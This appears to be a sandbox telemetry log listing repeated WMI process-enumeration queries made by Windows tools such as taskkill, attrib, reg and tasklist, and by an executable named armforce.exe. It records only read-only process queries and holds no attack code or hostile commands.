Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armforce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armforce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armforce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
